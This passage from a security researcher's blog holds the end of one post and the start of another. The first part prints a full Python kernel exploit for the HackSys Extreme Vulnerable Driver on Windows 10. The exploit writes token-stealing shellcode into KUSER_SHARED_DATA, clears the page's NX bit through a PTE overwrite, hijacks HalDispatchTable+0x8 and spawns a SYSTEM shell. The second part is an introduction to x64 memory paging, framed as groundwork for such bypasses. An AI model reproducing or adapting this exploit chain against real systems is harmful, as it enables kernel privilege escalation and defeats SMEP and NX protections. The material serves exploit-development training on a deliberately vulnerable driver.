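To make the bit manipulation concrete, here is a small sketch. The no-execute flag is bit 63 of an x64 PTE, so clearing only that bit is the narrowest change, while the mask used in this post clears the whole top nibble (bits 63-60). The `sample_pte` value is made up for illustration and was not read from a real system.

```python
NX_BIT = 1 << 63                      # no-execute flag in an x64 PTE
TOP_NIBBLE_MASK = 0x0FFFFFFFFFFFFFFF  # mask used in this post (clears bits 63-60)


def clear_nx(pte):
    """Return pte with only the NX bit cleared."""
    return pte & ~NX_BIT


# Hypothetical PTE value: NX set, remaining top bits clear.
sample_pte = 0x8000000000963963

print("original      : 0x{0:016X}".format(sample_pte))
print("NX bit cleared: 0x{0:016X}".format(clear_nx(sample_pte)))
print("post's mask   : 0x{0:016X}".format(sample_pte & TOP_NIBBLE_MASK))
```

Unlike subtracting a constant, the AND is idempotent: applying it to a PTE whose bit is already clear leaves the value untouched, so it is safe even if the page was already executable.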

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Defining KUSER_SHARED_DATA
KUSER_SHARED_DATA = 0xFFFFF78000000000

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)
    ]

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)
    ]

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)
    ]

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)
    ]

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)
    ]

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)
    ]

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)
    ]

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)
    ]


# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

"""
Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!
"""

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored
# Base of the PTEs is stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs is located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = (KUSER_SHARED_DATA + 0x800) >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing last 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to store PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Clear the NX bit in the PTE for KUSER_SHARED_DATA + 0x800

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute = pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #12 since a pointer to the PTE control bits is needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisfy c_void_p type from structure.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM x 2!

Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP altogether and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note- some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00

Introduction

0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscure 8 bytes we stumble across so often.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled is the concept of “resource sharing”. For example, if we have two instances of calc.exe, these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understand WHAT paging actually does, let’s take a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode we are using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to bit 31 of the CR0 register (counting from bit 0). If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing that bit 31 of the CR0 register is set to 1.

We now know that paging is enabled based on the image above- but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging requires Physical Address Extension, or PAE, to be enabled. PAE is a prerequisite for 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

Bit 5 of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.
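
The two bit checks described above can be sketched in a few lines of Python 3. The register values below are hypothetical samples chosen for illustration (they are not taken from the screenshots), and the helper name bit_is_set is an assumption of this sketch.

```python
# Bit positions as described above: CR0.PG is bit 31, CR4.PAE is bit 5.
CR0_PG_BIT = 31
CR4_PAE_BIT = 5


def bit_is_set(register_value, bit):
    """Return True if the given bit (counting from 0) is set."""
    return ((register_value >> bit) & 1) == 1


# Hypothetical register values, for illustration only. Read the real
# ones from your own debugger session.
cr0 = 0x80050033
cr4 = 0x00170678

print("Paging enabled (CR0.PG):", bit_is_set(cr0, CR0_PG_BIT))
print("PAE enabled (CR4.PAE):", bit_is_set(cr4, CR4_PAE_BIT))
```

Swapping in the values you read out of the debugger should tell you the same thing the screenshots do.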

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each group of 9 bits in a virtual address (47-39, 38-30, 29-21, 20-12) is actually just an index into one of the paging structure tables. The remaining 12 bits (11-0) are an offset, which we will come back to later.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line. This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you)- let’s circle back to bits 63-48, which are represented as “Sign Extend”.

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). Firstly, the MMU would not be able to keep track of all of this efficiently from a translation perspective, and secondly (and most importantly), systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-48 are a sign extension (copies) of bit 47 is known as a canonical address.

Sign extending bit 47 into bits 63-48 limits the virtual address space to 256 TB. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-48 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.
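
As a rough illustration of the rule above, here is a small Python 3 sketch that tests whether an address is canonical under 48-bit addressing. The function name is_canonical_48 is made up for this example. The user mode address is the KERNELBASE!VirtualProtect address from above, while the kernel mode and invalid addresses are hypothetical values picked to exercise each case.

```python
def is_canonical_48(address):
    """True if bits 63-48 are all copies of bit 47 (48-bit addressing)."""
    # Bits 63-47 are 17 bits in total. In a canonical address they are
    # either all 0 (bit 47 clear) or all 1 (bit 47 set).
    top_bits = (address >> 47) & 0x1FFFF
    return top_bits == 0 or top_bits == 0x1FFFF


user_address = 0x00007FFCE032CFC0    # KERNELBASE!VirtualProtect, from above
kernel_address = 0xFFFFF80000000000  # hypothetical kernel mode address
bad_address = 0x0000800000000000     # hypothetical: bit 47 set, bits 63-48 clear

for addr in (user_address, kernel_address, bad_address):
    print(hex(addr), "canonical" if is_canonical_48(addr) else "NOT canonical")
```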

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of terminology, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.
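
The sizes quoted above all fall out of two numbers from this post: 512 entries per table and a 4 KB page. The short Python 3 sketch below works the arithmetic through; the variable names are only for illustration.

```python
ENTRIES_PER_TABLE = 512   # each paging structure holds 512 entries
PAGE_SIZE = 4 * 1024      # one PTE maps one 4 KB physical page

KB, MB, GB, TB = 1024, 1024**2, 1024**3, 1024**4

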